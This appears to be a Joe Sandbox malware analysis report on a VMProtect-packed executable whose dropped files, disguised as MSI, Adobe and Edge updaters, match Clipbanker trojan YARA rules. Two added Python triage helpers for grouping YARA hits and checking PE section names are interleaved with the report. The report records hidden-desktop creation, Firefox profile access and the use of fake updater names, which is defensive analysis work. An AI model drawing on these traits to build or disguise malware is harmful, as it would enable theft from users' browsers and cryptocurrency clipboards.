Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
Source: file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06F0C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_06F0C230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06EE9080 OpenDesktopA,CreateDesktopA, 0_2_06EE9080

System Summary

Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
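The 48 "Matched rule" lines above describe only twelve processes: each UNPACKEDPE entry names a process with a decimal id (e.g. 28.2.AdobeUpdaterV2.exe) and each MEMORY entry refers to the same process with an 8-digit hex id (0000001C = 28). The following Python is an added triage helper, not part of the Joe Sandbox report; it parses these report lines, normalises both id formats, and groups the YARA hits per process so that the image name from the unpack entry is attached to the anonymous memory-dump hits. The sample input is a constructed subset of lines copied from this report, and process 7 is deliberately included only as a memory dump to show how unnamed processes are reported.

```python
import re

# Constructed sample: a subset of the "Matched rule" lines from this report.
# The last line is a non-YARA line to show that unrelated lines are skipped.
SAMPLE_REPORT = """\
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: file.exe Static PE information: section name: .vmp,,,0
"""

# "<pid>.<stage>.<image>.<imagebase>.<n>.unpack" with decimal pid/stage.
UNPACK_RE = re.compile(
    r"^Source: (\d+)\.(\d+)\.(.+?)\.[0-9A-Fa-f]+\.\d+\.unpack, type: UNPACKEDPE "
    r"Matched rule: (\S+)")
# "<pid>.<stage>.<dumpid>.<address>.<...>.sdmp" with 8-digit hex pid/stage.
MEMORY_RE = re.compile(
    r"^Source: ([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(?:[0-9A-Fa-f]+\.)+sdmp, type: MEMORY "
    r"Matched rule: (\S+)")


def parse_matches(text):
    """Group YARA hits by (pid, stage), merging unpack and memory-dump entries.

    Unpack entries carry decimal ids, memory dumps carry hex ids; both are
    converted to int so the same process ends up under one key.
    """
    procs = {}
    for line in text.splitlines():
        m = UNPACK_RE.match(line)
        if m:
            key, image, rule, src = (int(m[1]), int(m[2])), m[3], m[4], "unpack"
        else:
            m = MEMORY_RE.match(line)
            if not m:
                continue  # not a YARA match line
            key, image, rule, src = (int(m[1], 16), int(m[2], 16)), None, m[3], "memory"
        entry = procs.setdefault(key, {"image": None, "rules": set(), "sources": set()})
        if image:
            entry["image"] = image
        entry["rules"].add(rule)
        entry["sources"].add(src)
    return procs


def summarize(procs):
    """One row per process, sorted by pid: (pid, stage, image, rules, sources)."""
    return [(pid, stage, e["image"], tuple(sorted(e["rules"])), tuple(sorted(e["sources"])))
            for (pid, stage), e in sorted(procs.items())]


def unnamed_processes(procs):
    """Pids seen only in memory dumps; resolve these against the process tree."""
    return sorted(pid for (pid, _), e in procs.items() if e["image"] is None)


if __name__ == "__main__":
    procs = parse_matches(SAMPLE_REPORT)
    for pid, stage, image, rules, sources in summarize(procs):
        print(f"pid {pid:>3} stage {stage} {image or '<memory only>':<28} "
              f"{len(rules)} rule(s) via {'+'.join(sources)}")
    print("unnamed:", unnamed_processes(procs))
```

Run against the full report, every one of the twelve memory dumps above maps onto an unpack entry with the same pid, so the Clipbanker rules fire on both the dumped image and the live memory of each dropped binary.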
Source: file.exe Static PE information: section name: .vmp,,,0
Source: file.exe Static PE information: section name: .vmp,,,1
Source: file.exe Static PE information: section name: .vmp,,,2
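The section names .vmp,,,0 / .vmp,,,1 / .vmp,,,2 are what triggers the "PE file contains section with special chars" signature, and the .vmp prefix is the one VMProtect emits. The Python below is an added static check, not part of the report or of Joe Sandbox, that reads section names and the COFF Characteristics field directly from the PE headers (no third-party PE library) and flags names that either contain characters outside the conventional set or start with a known protector prefix. The sample PE is constructed in the code (a bare DOS stub, COFF header, zeroed optional header and section table) with the section names and the EXECUTABLE_IMAGE | 32BIT_MACHINE characteristics this report lists; the list of packer prefixes is an assumption-free set of well-known names, not something derived from the sample.

```python
import re
import struct

# COFF file-header Characteristics bits (PE/COFF specification).
CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# A conventional section name: optional dot, then up to 7 word characters or '$'.
CONVENTIONAL = re.compile(r"^\.?[A-Za-z0-9_$]{1,7}$")
# Well-known protector/packer section prefixes (case-insensitive match).
PACKER_PREFIXES = {
    ".vmp": "VMProtect",
    "upx": "UPX",
    ".themida": "Themida",
    ".aspack": "ASPack",
    ".petite": "Petite",
    ".mpress": "MPRESS",
}


def section_names(pe: bytes):
    """Return (section names, Characteristics) parsed from the PE headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", pe, coff)
    first = coff + 20 + opt_size  # section table follows the optional header
    names = []
    for i in range(nsections):
        raw = pe[first + 40 * i: first + 40 * i + 8]  # 8-byte Name field
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names, chars


def describe_characteristics(chars: int):
    """Decode known Characteristics bits into names, lowest bit first."""
    return [name for bit, name in sorted(CHARACTERISTICS.items()) if chars & bit]


def check_sections(pe: bytes):
    """Return [(section name, [reasons])] for every suspicious section."""
    names, _chars = section_names(pe)
    findings = []
    for name in names:
        reasons = []
        if not CONVENTIONAL.match(name):
            reasons.append("non-conventional characters")
        for prefix, tool in PACKER_PREFIXES.items():
            if name.lower().startswith(prefix):
                reasons.append(f"packer section prefix ({tool})")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_pe(names):
    """Constructed minimal 32-bit PE with the given section names (headers only)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    secs = b"".join(n.encode("latin-1").ljust(8, b"\0") + bytes(32) for n in names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs


# Section names and Characteristics as reported for file.exe above.
SAMPLE_PE = build_sample_pe([".text", ".vmp,,,0", ".vmp,,,1", ".vmp,,,2"])

if __name__ == "__main__":
    names, chars = section_names(SAMPLE_PE)
    print("sections:", names, "|", ", ".join(describe_characteristics(chars)))
    for name, reasons in check_sections(SAMPLE_PE):
        print(f"  suspicious {name!r}: {'; '.join(reasons)}")
```

Point section_names() at a real file's bytes to reproduce the report's "section name" and "EXECUTABLE_IMAGE, 32BIT_MACHINE" lines; the check only reads headers, so it is safe to run on the submitted sample without executing it.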
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B8080 0_2_009B8080
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0090001D 0_2_0090001D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FC8D0 0_2_009FC8D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0095CBF0 0_2_0095CBF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00967D20 0_2_00967D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A040A0 0_2_00A040A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F20C0 0_2_009F20C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B0350 0_2_009B0350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0090035F 0_2_0090035F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A6269F 0_2_00A6269F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009147AD 0_2_009147AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008FA918 0_2_008FA918
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008FC950 0_2_008FC950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A04AE0 0_2_00A04AE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4EA59 0_2_00B4EA59
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009A4B90 0_2_009A4B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00918BA0 0_2_00918BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00918E20 0_2_00918E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009ACFC0 0_2_009ACFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B29025 0_2_00B29025
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F7190 0_2_008F7190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00961130 0_2_00961130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A03160 0_2_00A03160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A6729A 0_2_00A6729A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008EF570 0_2_008EF570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BBDB7F 0_2_00BBDB7F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A8FCED 0_2_00A8FCED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00961E40 0_2_00961E40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009ABFC0 0_2_009ABFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06EEA230 0_2_06EEA230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06F0C990 0_2_06F0C990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06F0D540 0_2_06F0D540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06EE9A10 0_2_06EE9A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06EF3B60 0_2_06EF3B60
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: C:\Users\user\Desktop\file.exe Code function: String function: 008DACE0 appears 62 times
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000003.2224536792.0000000006AC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2226429039.0000000006AC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2231591589.0000000006ACB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2168366687.000000000688A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2171906117.0000000006887000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2169325992.0000000006888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
